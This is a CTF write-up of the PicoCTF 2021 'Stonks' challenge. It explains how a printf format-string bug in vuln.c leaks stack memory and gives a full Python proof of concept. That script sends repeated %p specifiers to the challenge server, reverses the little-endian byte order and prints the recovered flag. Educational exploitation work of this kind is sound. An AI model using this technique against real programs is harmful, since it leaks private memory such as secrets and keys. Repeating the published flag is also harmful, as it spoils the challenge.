Preamble

Stonks was a binary exploitation problem from the PicoCTF 2021 competition. It featured a variety of techniques that I hadn’t used before and introduced me to some new tools to consider in the future.

The problem may be accessed here for those interested.

This problem provided a source code file - vuln.c - and a compiled version accessible via netcat. As the attacker, we are meant to read the source code to identify a vulnerability and then exploit it against the compiled version in order to obtain the flag (format: picoCTF{…}).

As with any C program, execution starts at the main() function. In main(), the user is prompted to choose either “1” or “2”, which invokes the buy_stonks() or view_portfolio() function, respectively. I noted at this juncture that user input is (somewhat) sanitized; entering anything other than “1” or “2” simply exits the program.

Of the two potential functions to be invoked, buy_stonks() was the more interesting (as the latter simply output some information that we - as the attacker - had no control over). The buy_stonks() function was as follows:

int buy_stonks(Portfolio *p) {
	if (!p) {
		return 1;
	}
	char api_buf[FLAG_BUFFER];
	FILE *f = fopen("api","r");
	if (!f) {
		printf("Flag file not found. Contact an admin.\n");
		exit(1);
	}
	fgets(api_buf, FLAG_BUFFER, f);

	int money = p->money;
	int shares = 0;
	Stonk *temp = NULL;
	printf("Using patented AI algorithms to buy stonks\n");
	while (money > 0) {
		shares = (rand() % money) + 1;
		temp = pick_symbol_with_AI(shares);
		temp->next = p->head;
		p->head = temp;
		money -= shares;
	}
	printf("Stonks chosen\n");

	// TODO: Figure out how to read token from file, for now just ask

	char *user_buf = malloc(300 + 1);
	printf("What is your API token?\n");
	scanf("%300s", user_buf);
	printf("Buying stonks with token:\n");
	printf(user_buf);

	// TODO: Actually use key to interact with API

	view_portfolio(p);

	return 0;
}

At a glance, I can infer the following:

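The compiled version of the program reads a file that likely contains the flag into the local buffer api_buf (the fopen("api","r") and fgets() calls near the top of the function).
The user is prompted a second time for input (the malloc(), scanf() and printf() calls near the end), with their input stored in the variable user_buf.

At first, I thought to attempt a buffer overflow. This, however, would not work: scanf("%300s", user_buf) reads at most 300 characters, and user_buf was allocated with 301 bytes, which leaves room for the terminating null byte.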

At this point, I could not identify (through my own experience) where another vulnerability might exist. To that end, I turned to a static code analyzer, Flawfinder. Flawfinder is a simple program that scans C/C++ source code and reports potential security flaws. By running flawfinder vuln.c, we note the following amongst the output:

Flawfinder outputs a number of entries, assigning each one a risk level from 1 to 5 (with 5 being the riskiest). In the case of vuln.c, there are 2 level-4 vulnerabilities reported.

If we look at the first vulnerability reported, CWE-78 is a command injection vulnerability (i.e. passing bash commands to system() in order to achieve command execution). In the referenced code block, the system() call invokes date, which in the Linux command line returns the current date. Since we have no control over what is entered into the system() call, this vulnerability does not appear to be exploitable.

The second vulnerability reported is CWE-134 (use of an externally controlled format string), which can lead to buffer overflows or data representation problems.

A *printf() call without a format specifier is dangerous and can be exploited. For example, printf(input); is exploitable, while printf(y, input); is not exploitable in that context. The result of the first call, used incorrectly, allows for an attacker to be able to peek at stack memory since the input string will be used as the format specifier. The attacker can stuff the input string with format specifiers and begin reading stack values, since the remaining parameters will be pulled from the stack. Worst case, this improper use may give away enough control to allow an arbitrary value (or values in the case of an exploit program) to be written into the memory of the running program.

In essence, the first argument to printf() describes how the remaining arguments should be formatted. For example, printf("%d", someInteger) explicitly stipulates that the value of someInteger will be formatted and printed as an integer ("%d"). OWASP demonstrates that it is possible to retrieve memory from the program Stack by placing conversion specifiers such as %s, %x, and %p in the string passed to printf() without supplying matching arguments. For a quick refresher on what is the Stack, see the following:
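To make the mechanism concrete, here is a toy Python model of a printf() that is handed only a format string. This is my own illustration and not how libc is implemented: the name toy_printf and the contents of fake_stack are made up. The point is simply that every %x or %p consumes the next word, whether or not the caller actually supplied it.

```python
import re

def toy_printf(fmt, stack_words):
    """Toy model: each %x or %p in fmt consumes the next word of stack_words.

    stack_words stands in for whatever happens to sit where printf() expects
    its arguments. Hypothetical helper, for illustration only.
    """
    words = iter(stack_words)

    def substitute(match):
        word = next(words, None)
        if word is None:
            return "?"  # the toy stack ran out of words
        if match.group(1) == "x":
            return f"{word:x}"
        return f"0x{word:x}"

    return re.sub(r"%([xp])", substitute, fmt)

# Made-up stack contents; the last two words spell part of a flag in memory.
fake_stack = [0x0804b000, 0x6f636970, 0x7b465443]
print(toy_printf("%x_%x_%x", fake_stack))
```

A string with no specifiers passes through unchanged, which is why the bug goes unnoticed with ordinary input.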

Since we do have control of what goes into user_buf, we can see if the program leaks information by injecting into it.

Sure enough, when I pass a value as simple as %x, some kind of (potentially hex) value comes back. (NOTE: in the snapshot below, I use a python script to help automate my test calls; the final POC code will be provided below).

With the vulnerability confirmed as exploitable, my goal now was to determine what could be done with it.

Based on my understanding of the call stack (again, see video above), the contents of the flag file should still be residing in memory at the time that the printf() statement is run: api_buf is a local array of buy_stonks(), so it sits in that function's stack frame until the function returns. This means that we can print it, if only we can find it.

Fortunately, as the OWASP article points out, each additional %x or %p makes printf() read the next word further along the Stack. Therefore, if we supply enough of them and try to convert the (presumably hexadecimal) values to ASCII text, we might discover the flag. This works (somewhat) when we try passing %x several dozen times and use a hex-to-ASCII converter:
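As a rough sketch of that step, the two helpers below build a payload of repeated %p specifiers and turn the program's reply back into integers. The names build_payload and parse_leak, the separator, and the sample reply are all assumptions of mine for illustration; the sample is not real output from the challenge server.

```python
def build_payload(count, sep="_"):
    """Return count copies of %p, each followed by a separator."""
    return ("%p" + sep) * count

def parse_leak(response, sep="_"):
    """Split a reply on the separator and keep the pieces that parse as hex.

    Pieces such as "(nil)", empty strings, or prompt text raise ValueError
    and are skipped.
    """
    values = []
    for token in response.split(sep):
        try:
            values.append(int(token.strip(), 16))
        except ValueError:
            continue
    return values

# Made-up reply, shaped like what a run of %p_ specifiers would print.
sample_reply = "0x9d4b3b0_0x804b000_(nil)_0x6f636970_0x7b465443_"
print(build_payload(3))
print([hex(v) for v in parse_leak(sample_reply)])
```

Using a separator that cannot appear inside a hex value keeps the parsing trivial.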

In the snapshot above, we do see what appears to be the makings of a flag, but it is somewhat jumbled. This, as it turns out, is the result of endianness. In brief, endianness (either “big” or “little”) refers to the order in which bytes are stored into memory; a big-endian system stores the most significant byte at the smallest memory address and the least significant byte at the largest (and little-endian, vice versa).
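A small example, using only Python's standard struct module, shows why the text comes out jumbled. The two sample words are values I picked so that they spell the start of a flag; they are not copied from the real leak.

```python
import struct

# Two 32-bit values as %x would print them (chosen for illustration).
words = [0x6f636970, 0x7b465443]

# Naive conversion: read the hex digits left to right, most significant byte first.
naive = b"".join(bytes.fromhex(f"{w:08x}") for w in words)

# Little-endian packing: least significant byte first, as it was laid out in memory.
restored = b"".join(struct.pack("<I", w) for w in words)

print(naive)     # b'ocip{FTC'
print(restored)  # b'picoCTF{'
```

Each group of four characters is reversed in the naive version, which matches the kind of jumbling described above.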

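In our case, each value that %x or %p prints is a 32-bit word shown most significant byte first, while the flag's characters were stored in memory least significant byte first, so the four bytes of every word need to be reversed. It is entirely possible to reorder the characters by hand at this point, but in an effort to learn more (which is the whole point of working with PicoCTF) I sought to write my own python script. Fortunately, the python pwn module (pwntools) provides this capability: p32() packs an integer into four little-endian bytes.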

Below was my final POC code:

#!/usr/bin/env python3

import socket
import time
from pwn import p32  # pwntools; only p32() is used below

#Initiate a socket connection to the compiled code
hostname = "mercury.picoctf.net"
port = 20195
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((hostname, port))

#Defined method to handle receiving response from the compiled code
def testrecv():
	res = ""
	while True:
		data = sock.recv(1024)
		if (not data):
			break
		res += data.decode()
	print(res)
	return res


resp = sock.recv(2048)
content = "1" + ("%p_" * 50)  # Trigger buy_stonks(), then submit a sequence of %p_%p_ entries
sock.send(content.encode())
time.sleep(0.2)
sock.shutdown(socket.SHUT_WR) # Signal to the compiled code that we are done writing
hexdump = testrecv()
print("Connection terminated")
sock.close()

#Because we used "_" between pointer calls, we can use them to parse the
#response from the server.
hexlist = hexdump.split('_')

print("Starting loop")
ans = b""
#Each entry is formatted in hex
#Example: 0x01238F2A
for entry in hexlist:
	try:
		hex_string = entry[2:]	#strip off 0x
		value = int(hex_string, 16) #convert to an int; needed for p32()
		ans += p32(value) #pack as 4 little-endian bytes, restoring the order the bytes had in memory
	except Exception:
		#Skip entries that are not 32-bit hex values, e.g. "(nil)" or prompt text
		continue

#Make the output more readable to find the flag
idx_start = ans.find(b'pico')
idx_end = ans.find(b'}', idx_start) + 1 #first closing brace after the start of the flag
print(ans[idx_start:idx_end]) #outputs: b'picoCTF{I_l05t_4ll_my_m0n3y_6045d60d}'

PicoCTF 2021 Writeup: Stonks

A detailed writeup on the Stonks problem from PicoCTF 2021
